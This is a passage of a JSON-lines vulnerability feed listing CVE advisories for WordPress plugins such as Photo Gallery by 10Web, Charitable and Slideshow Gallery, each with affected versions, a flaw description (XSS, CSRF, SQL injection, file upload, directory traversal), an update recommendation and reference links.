version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5aca31f5-310f-441b-8d8c-51b7bf2b0b7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5aca31f5-310f-441b-8d8c-51b7bf2b0b7d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089669%40fetch-jft%2Ftrunk&old=3025839%40fetch-jft%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089669%40fetch-jft%2Ftrunk&old=3025839%40fetch-jft%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2269","slug":"photo-gallery","versionImpact":"1.8.34","versionEndExcluding":"1.8.35","description":"The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018image_id\u2019 parameter in all versions up to, and including, 1.8.34 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link.","recommendation":"Update to version 1.8.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.34\\\/admin\\\/views\\\/Editimage.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.34\\\/admin\\\/views\\\/Editimage.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce261415-870c-4300-85e8-b15a02c7eec5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce261415-870c-4300-85e8-b15a02c7eec5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0613","slug":"photo-gallery","versionImpact":"1.8.33","versionEndExcluding":"1.8.34","description":"The Photo Gallery by 10Web  WordPress plugin before 1.8.34 does not sanitised and escaped comment added on images by unauthenticated users, leading to an Unauthenticated Stored-XSS attack when comments are displayed","recommendation":"Update to version 1.8.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/22be2b44-cd42-4b02-8448-59dd2989dde1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/22be2b44-cd42-4b02-8448-59dd2989dde1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13124","slug":"photo-gallery","versionImpact":"1.8.32","versionEndExcluding":"1.8.33","description":"The Photo Gallery by 10Web  WordPress plugin before 1.8.33 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.8.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b3bf87b-73a1-47e8-bb00-0dfded07b191\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b3bf87b-73a1-47e8-bb00-0dfded07b191\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9878","slug":"photo-gallery","versionImpact":"1.8.30","versionEndExcluding":"1.8.31","description":"The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.8.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.8.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfa1192b-34f5-4b71-8fff-14f2d4ac4aca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfa1192b-34f5-4b71-8fff-14f2d4ac4aca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179357\\\/WordPress-Photo-Gallery-1.8.26-Cross-Site-Scripting.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179357\\\/WordPress-Photo-Gallery-1.8.26-Cross-Site-Scripting.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3180567%40photo-gallery%2Ftrunk&old=3171538%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=#file12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3180567%40photo-gallery%2Ftrunk&old=3171538%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=#file12\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10704","slug":"photo-gallery","versionImpact":"1.8.30","versionEndExcluding":"1.8.31","description":"The Photo Gallery by 10Web  WordPress plugin before 1.8.31 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.8.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6c115117-11c0-4c9e-9988-8547c9364c01\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6c115117-11c0-4c9e-9988-8547c9364c01\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10876","slug":"charitable","versionImpact":"1.8.3","versionEndExcluding":"1.8.3.1","description":"The Charitable \u2013 Donation Plugin for WordPress \u2013 Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.8.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.8.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68014bb5-b2ef-4e2f-9c47-85e555ded5a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68014bb5-b2ef-4e2f-9c47-85e555ded5a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.8.2\\\/includes\\\/admin\\\/donations\\\/class-charitable-donation-list-table.php#L318\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.8.2\\\/includes\\\/admin\\\/donations\\\/class-charitable-donation-list-table.php#L318\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183944\\\/charitable\\\/trunk\\\/includes\\\/admin\\\/donations\\\/class-charitable-donation-list-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183944\\\/charitable\\\/trunk\\\/includes\\\/admin\\\/donations\\\/class-charitable-donation-list-table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4475","slug":"jquery-collapse-o-matic","versionEndExcluding":"1.8.3","description":"The Collapse-O-Matic WordPress plugin before 1.8.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b5c377c-3148-4373-996c-89851d5e39e5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b5c377c-3148-4373-996c-89851d5e39e5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7031","slug":"filester","versionImpact":"1.8.2","versionEndExcluding":"1.8.3","description":"The File Manager Pro \u2013 Filester plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'njt_fs_saveSettingRestrictions' function in all versions up to, and including, 1.8.2. This makes it possible for authenticated attackers, with a role that has been granted permissions by an Administrator, to update the plugin settings for user role restrictions, including allowing file types such as .php to be uploaded.","recommendation":"Update to version 1.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aef584bd-60a5-4bf2-b8d3-58e3b45e785e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aef584bd-60a5-4bf2-b8d3-58e3b45e785e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/includes\\\/File_manager\\\/FileManager.php#L566\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/includes\\\/File_manager\\\/FileManager.php#L566\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129722\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129722\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1452","slug":"generateblocks","versionImpact":"1.8.2","versionEndExcluding":"1.8.3","description":"The GenerateBlocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.2 via Query Loop. This makes it possible for authenticated attackers, with contributor access and above, to see contents of posts and pages in draft or private status as well as those with scheduled publication dates.","recommendation":"Update to version 1.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62f19301-2311-4989-a5f2-9f845b72dd54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62f19301-2311-4989-a5f2-9f845b72dd54?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-query-loop.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-query-loop.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-query-loop.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-query-loop.php#L140\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041431%40generateblocks%2Ftrunk&old=2995923%40generateblocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041431%40generateblocks%2Ftrunk&old=2995923%40generateblocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1039","slug":"lenix-elementor-leads-addon","versionImpact":"1.8.2","versionEndExcluding":"1.8.3","description":"The Lenix Elementor Leads addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a URL form field in all versions up to, and including, 1.8.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237538\\\/lenix-elementor-leads-addon\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237538\\\/lenix-elementor-leads-addon\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d1abaf9-4044-4dcc-95df-73f23a8a5a9f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d1abaf9-4044-4dcc-95df-73f23a8a5a9f\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29f835c8-769a-47c0-832f-622860b1c59c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29f835c8-769a-47c0-832f-622860b1c59c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9647","slug":"kama-spamblock","versionImpact":"1.8.2","versionEndExcluding":"1.8.3","description":"The Kama SpamBlock plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_POST values in all versions up to, and including, 1.8.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f2d3acb-5931-4629-8f03-4ab40fadf7c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f2d3acb-5931-4629-8f03-4ab40fadf7c7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kama-spamblock\\\/tags\\\/1.8.2\\\/Kama_Spamblock.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kama-spamblock\\\/tags\\\/1.8.2\\\/Kama_Spamblock.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167874\\\/kama-spamblock\\\/tags\\\/1.8.3\\\/Kama_Spamblock.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167874\\\/kama-spamblock\\\/tags\\\/1.8.3\\\/Kama_Spamblock.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36744","slug":"notificationx","versionEndExcluding":"1.8.3","description":"The NotificationX plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.2. This is due to missing or incorrect nonce validation on the generate_conversions() function. This makes it possible for unauthenticated attackers to generate conversions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ebe7680-a76d-4178-a729-f0d79d861912?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ebe7680-a76d-4178-a729-f0d79d861912?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368331\\\/notificationx\\\/trunk\\\/public\\\/class-nx-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368331\\\/notificationx\\\/trunk\\\/public\\\/class-nx-public.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8670","slug":"photo-gallery","versionImpact":"1.8.28","versionEndExcluding":"1.8.29","description":"The Photo Gallery by 10Web  WordPress plugin before 1.8.29 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.8.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50665594-778b-42f5-bfba-2a249a5e0260\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50665594-778b-42f5-bfba-2a249a5e0260\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5426","slug":"photo-gallery","versionImpact":"1.8.23","versionEndExcluding":"1.8.24","description":"The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018svg\u2019 parameter in all versions up to, and including, 1.8.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this can only be exploited by administrators, but the ability to use and configure Photo Gallery can be extended to contributors on pro versions of the plugin.","recommendation":"Update to version 1.8.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13436238-f14a-445b-9a9b-fbcf23b7b498?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13436238-f14a-445b-9a9b-fbcf23b7b498?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/UploadHandler.php#L521\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/UploadHandler.php#L521\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/UploadHandler.php#L542\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/UploadHandler.php#L542\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098798\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098798\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0221","slug":"photo-gallery","versionImpact":"1.8.19","versionEndExcluding":"1.8.20","description":"The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.8.19 via the rename_item function. This makes it possible for authenticated attackers to rename arbitrary files on the server. This can lead to site takeovers if the wp-config.php file of a site can be renamed. By default this can be exploited by administrators only. In the premium version of the plugin, administrators can give gallery management permissions to lower level users, which might make this exploitable by users as low as contributors.","recommendation":"Update to version 1.8.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L441\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L441\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L291\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L291\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0538","slug":"campaign-url-builder","versionEndExcluding":"1.8.2","description":"The Campaign URL Builder WordPress plugin before 1.8.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4869fdc7-4fc7-4917-bc00-b6ced9ccc871\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4869fdc7-4fc7-4917-bc00-b6ced9ccc871\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5543","slug":"slideshow-gallery","versionImpact":"1.8.1","versionEndExcluding":"1.8.2","description":"The Slideshow Gallery LITE plugin for WordPress is vulnerable to time-based SQL Injection via the id parameter in all versions up to, and including, 1.8.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5edd72d9-3086-4f4f-ae5b-830c8621b83a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5edd72d9-3086-4f4f-ae5b-830c8621b83a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slideshow-gallery\\\/trunk\\\/slideshow-gallery.php#L620\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slideshow-gallery\\\/trunk\\\/slideshow-gallery.php#L620\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3100785%40slideshow-gallery%2Ftrunk&old=3098970%40slideshow-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3100785%40slideshow-gallery%2Ftrunk&old=3098970%40slideshow-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4949","slug":"adsanity","versionEndExcluding":"1.8.2","description":"The AdSanity plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'ajax_upload' function in versions up to, and including, 1.8.1. This makes it possible for authenticated attackers with Contributor+ level privileges to upload arbitrary files on the affected sites server which makes remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-wordpress-adsanity-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-wordpress-adsanity-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/effd72d2-876d-4f8d-b1e4-5ab38eab401b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/effd72d2-876d-4f8d-b1e4-5ab38eab401b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6924","slug":"photo-gallery","versionImpact":"1.8.18","versionEndExcluding":"1.8.19","description":"The Photo Gallery by 10Web plugin for WordPress is vulnerable to Stored Cross-Site Scripting via widgets in versions up to, and including, 1.8.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with administrator-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. It can also be exploited with a contributor-level permission with a page builder plugin.","recommendation":"Update to version 1.8.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21b4d1a1-55fe-4241-820c-203991d724c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21b4d1a1-55fe-4241-820c-203991d724c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.18\\\/admin\\\/views\\\/Widget.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.18\\\/admin\\\/views\\\/Widget.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.18\\\/admin\\\/views\\\/WidgetSlideshow.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.18\\\/admin\\\/views\\\/WidgetSlideshow.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.18\\\/admin\\\/views\\\/WidgetTags.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.18\\\/admin\\\/views\\\/WidgetTags.php#L58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013021\\\/photo-gallery\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013021\\\/photo-gallery\",\"refsource\":\"\",\"tags\":[]}]"}
